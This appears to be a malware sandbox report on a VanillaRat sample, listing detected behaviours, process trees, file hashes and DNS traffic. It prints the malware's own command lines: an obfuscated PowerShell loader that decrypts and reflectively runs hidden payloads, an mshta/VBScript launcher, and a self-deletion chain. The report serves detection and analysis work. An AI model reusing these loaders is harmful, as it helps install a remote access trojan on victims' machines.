Analysis Overview
SHA256
e590d9d061fc38da277121abaf50c5d2432fe4cab8eb4fc347687d04c188f34b
Threat Level: Known bad
The file VanillaRat.rar was found to be: Known bad.
Malicious Activity Summary
Vanilla Rat payload
VanillaRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Vanillarat family
Vanilla Rat payload
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Kills process with taskkill
Views/modifies file attributes
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: CmdExeWriteProcessMemorySpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-11 20:13
Signatures
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Vanillarat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-11 20:13
Reported
2023-10-12 14:19
Platform
win7-20230831-en
Max time kernel
14s
Max time network
33s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2000 wrote to memory of 2748 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe |
| PID 2000 wrote to memory of 2748 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe |
| PID 2000 wrote to memory of 2748 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat"
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
"HandlerInstaller.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VROas($YFEKm){ $EnJnq=[System.Security.Cryptography.Aes]::Create(); $EnJnq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EnJnq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EnJnq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+mgHoM3Dd8LE9FhelB1+E49NCwweh3qyJF1GxhCe+k0='); $EnJnq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wwm30jhzkHC4/5SnlEDZGA=='); $pWYkp=$EnJnq.CreateDecryptor(); $return_var=$pWYkp.TransformFinalBlock($YFEKm, 0, $YFEKm.Length); $pWYkp.Dispose(); $EnJnq.Dispose(); $return_var;}function XcsVC($YFEKm){ $zQqyq=New-Object System.IO.MemoryStream(,$YFEKm); $emglC=New-Object System.IO.MemoryStream; $RGlqr=New-Object System.IO.Compression.GZipStream($zQqyq, [IO.Compression.CompressionMode]::Decompress); $RGlqr.CopyTo($emglC); $RGlqr.Dispose(); $zQqyq.Dispose(); $emglC.Dispose(); $emglC.ToArray();}function dnTmn($YFEKm,$CaEDQ){ $NmIfY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YFEKm); $bqkrl=$NmIfY.EntryPoint; $bqkrl.Invoke($null, $CaEDQ);}$lpRaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat').Split([Environment]::NewLine);foreach ($aneut in $lpRaC) { if ($aneut.StartsWith('SEROXEN')) { $zZPSp=$aneut.Substring(7); break; }}$jGZnr=[string[]]$zZPSp.Split('\');$yHwYZ=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[0])));$QcHAi=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[1])));dnTmn $QcHAi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dnTmn $yHwYZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Network
Files
\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/2748-5-0x000000001B080000-0x000000001B362000-memory.dmp
memory/2748-6-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
memory/2748-7-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
memory/2748-9-0x00000000021C0000-0x00000000021C8000-memory.dmp
memory/2748-8-0x0000000002640000-0x00000000026C0000-memory.dmp
memory/2748-10-0x0000000002640000-0x00000000026C0000-memory.dmp
memory/2748-11-0x0000000002640000-0x00000000026C0000-memory.dmp
memory/2748-12-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2023-10-11 20:13
Reported
2023-10-12 14:20
Platform
win7-20230831-en
Max time kernel
121s
Max time network
126s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Start.bat"
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe
Main\\VanillaRat.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\VanillaRat\\\Handlers\\HandlerInstaller.bat' -WindowStyle Hidden -Wait}"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat" "
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
"HandlerInstaller.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VROas($YFEKm){ $EnJnq=[System.Security.Cryptography.Aes]::Create(); $EnJnq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EnJnq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EnJnq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+mgHoM3Dd8LE9FhelB1+E49NCwweh3qyJF1GxhCe+k0='); $EnJnq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wwm30jhzkHC4/5SnlEDZGA=='); $pWYkp=$EnJnq.CreateDecryptor(); $return_var=$pWYkp.TransformFinalBlock($YFEKm, 0, $YFEKm.Length); $pWYkp.Dispose(); $EnJnq.Dispose(); $return_var;}function XcsVC($YFEKm){ $zQqyq=New-Object System.IO.MemoryStream(,$YFEKm); $emglC=New-Object System.IO.MemoryStream; $RGlqr=New-Object System.IO.Compression.GZipStream($zQqyq, [IO.Compression.CompressionMode]::Decompress); $RGlqr.CopyTo($emglC); $RGlqr.Dispose(); $zQqyq.Dispose(); $emglC.Dispose(); $emglC.ToArray();}function dnTmn($YFEKm,$CaEDQ){ $NmIfY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YFEKm); $bqkrl=$NmIfY.EntryPoint; $bqkrl.Invoke($null, $CaEDQ);}$lpRaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat').Split([Environment]::NewLine);foreach ($aneut in $lpRaC) { if ($aneut.StartsWith('SEROXEN')) { $zZPSp=$aneut.Substring(7); break; }}$jGZnr=[string[]]$zZPSp.Split('\');$yHwYZ=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[0])));$QcHAi=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[1])));dnTmn $QcHAi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dnTmn $yHwYZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Network
Files
memory/2412-4-0x000000001B1D0000-0x000000001B4B2000-memory.dmp
memory/2412-5-0x00000000023F0000-0x00000000023F8000-memory.dmp
memory/2412-6-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp
memory/2412-7-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp
memory/2412-9-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2412-8-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2308-10-0x00000000010F0000-0x00000000012B8000-memory.dmp
memory/2308-11-0x0000000074E30000-0x000000007551E000-memory.dmp
memory/2412-12-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2412-13-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2308-14-0x0000000004CD0000-0x0000000004D10000-memory.dmp
memory/2308-15-0x0000000005260000-0x0000000005340000-memory.dmp
memory/2308-16-0x0000000004CD0000-0x0000000004D10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/2576-22-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp
memory/2576-23-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2576-24-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp
memory/2576-25-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2412-26-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp
memory/2576-27-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2308-28-0x0000000074E30000-0x000000007551E000-memory.dmp
memory/2412-29-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2412-32-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2576-31-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2412-30-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2412-33-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2308-34-0x0000000004CD0000-0x0000000004D10000-memory.dmp
memory/2576-35-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp
memory/2412-36-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2023-10-11 20:13
Reported
2023-10-12 14:18
Platform
win10v2004-20230915-en
Max time kernel
146s
Max time network
153s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2688 created 620 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\system32\winlogon.exe |
| PID 2688 created 620 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\system32\winlogon.exe |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2688 set thread context of 2500 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 2688 set thread context of 3100 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 2688 set thread context of 3780 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 2688 set thread context of 1408 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Start.bat"
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe
Main\\VanillaRat.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\VanillaRat\\\Handlers\\HandlerInstaller.bat' -WindowStyle Hidden -Wait}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat" "
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
"HandlerInstaller.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VROas($YFEKm){ $EnJnq=[System.Security.Cryptography.Aes]::Create(); $EnJnq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EnJnq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EnJnq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+mgHoM3Dd8LE9FhelB1+E49NCwweh3qyJF1GxhCe+k0='); $EnJnq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wwm30jhzkHC4/5SnlEDZGA=='); $pWYkp=$EnJnq.CreateDecryptor(); $return_var=$pWYkp.TransformFinalBlock($YFEKm, 0, $YFEKm.Length); $pWYkp.Dispose(); $EnJnq.Dispose(); $return_var;}function XcsVC($YFEKm){ $zQqyq=New-Object System.IO.MemoryStream(,$YFEKm); $emglC=New-Object System.IO.MemoryStream; $RGlqr=New-Object System.IO.Compression.GZipStream($zQqyq, [IO.Compression.CompressionMode]::Decompress); $RGlqr.CopyTo($emglC); $RGlqr.Dispose(); $zQqyq.Dispose(); $emglC.Dispose(); $emglC.ToArray();}function dnTmn($YFEKm,$CaEDQ){ $NmIfY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YFEKm); $bqkrl=$NmIfY.EntryPoint; $bqkrl.Invoke($null, $CaEDQ);}$lpRaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat').Split([Environment]::NewLine);foreach ($aneut in $lpRaC) { if ($aneut.StartsWith('SEROXEN')) { $zZPSp=$aneut.Substring(7); break; }}$jGZnr=[string[]]$zZPSp.Split('\');$yHwYZ=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[0])));$QcHAi=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[1])));dnTmn $QcHAi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dnTmn $yHwYZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{01ec52bc-afe1-41ee-90d9-289da2193cb4}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{d2ce51a9-a5ae-449d-a6fd-ac314ed3df5f}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{9fcb8ade-53a3-4c52-8e47-77b36d962750}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{22ec52a2-41ad-464f-8e2a-90ef1700a6c8}
C:\Windows\system32\taskhostw.exe
taskhostw.exe C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe" & exit
C:\Windows\system32\PING.EXE
PING localhost -n 8
C:\Windows\system32\taskkill.exe
taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe"
C:\Windows\system32\attrib.exe
ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.178.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.36.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
memory/1084-5-0x000002A3EC420000-0x000002A3EC442000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybmnfiz5.bef.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1784-10-0x0000000000760000-0x0000000000928000-memory.dmp
memory/1084-11-0x00007FFF03130000-0x00007FFF03BF1000-memory.dmp
memory/1084-12-0x000002A3EC3E0000-0x000002A3EC3F0000-memory.dmp
memory/1784-13-0x00000000743F0000-0x0000000074BA0000-memory.dmp
memory/1784-15-0x0000000005910000-0x0000000005EB4000-memory.dmp
memory/1084-14-0x000002A3EC3E0000-0x000002A3EC3F0000-memory.dmp
memory/1784-16-0x0000000005210000-0x00000000052A2000-memory.dmp
memory/1784-17-0x0000000005350000-0x0000000005360000-memory.dmp
memory/1784-18-0x00000000052B0000-0x00000000052BA000-memory.dmp
memory/1084-19-0x00007FFF03130000-0x00007FFF03BF1000-memory.dmp
memory/1784-20-0x00000000743F0000-0x0000000074BA0000-memory.dmp
memory/1084-21-0x000002A3EC590000-0x000002A3EC6DE000-memory.dmp
memory/1084-22-0x000002A3EC3E0000-0x000002A3EC3F0000-memory.dmp
memory/1784-23-0x00000000064C0000-0x00000000065A0000-memory.dmp
memory/1784-24-0x0000000006BD0000-0x0000000006D76000-memory.dmp
memory/1784-25-0x0000000005350000-0x0000000005360000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/2688-39-0x00007FFF03130000-0x00007FFF03BF1000-memory.dmp
memory/2688-40-0x000001E9EB0E0000-0x000001E9EB0F0000-memory.dmp
memory/2688-41-0x000001E9EB0E0000-0x000001E9EB0F0000-memory.dmp
